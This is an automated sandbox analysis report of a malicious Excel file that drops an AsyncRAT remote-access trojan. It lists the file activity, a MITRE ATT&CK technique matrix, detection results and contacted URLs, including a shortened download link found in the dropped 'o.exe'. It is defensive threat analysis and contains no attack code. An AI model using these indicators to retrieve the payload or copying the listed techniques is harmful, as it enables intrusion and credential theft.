Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125A093 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125D220 memset,GetVersionExW,GetVersionExW,

Source: C:\Users\user\AppData\Local\Temp\o.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

Source: vc.exe, 00000020.00000002.534638947.0000000007643000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_01257732 SetErrorMode,CorBindToRuntimeEx,SysFreeString,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Scripting11	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Scheduled Task/Job1	Process Injection12	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Scheduled Task/Job1	Scripting11	Security Account Manager	System Information Discovery25	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information12	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing2	LSA Secrets	Security Software Discovery111	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Virtualization/Sandbox Evasion2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion2	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection12	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1099008FEDEX_090887766.xls	15%	ReversingLabs	Document-Word.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\powershell.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\powershell.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://tinyurl.com4	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://cdn.discordapp.com4	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tinyurl.com	104.20.138.65	true	false		high
cdn.discordapp.com	162.159.129.233	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://tinyurl.com/y3m5fwhq	o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://shell.suite.office.com:1443	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://cdn.entity.	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://wus2-000.contentsync.	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://powerlift.acompli.net	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://cortana.ai	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false		high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://api.aadrm.com/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://api.microsoftstream.com/api/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://cr.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.galapagosdesign.com/DPlease	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://portal.office.com/account/?ref=ClientMeControl	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
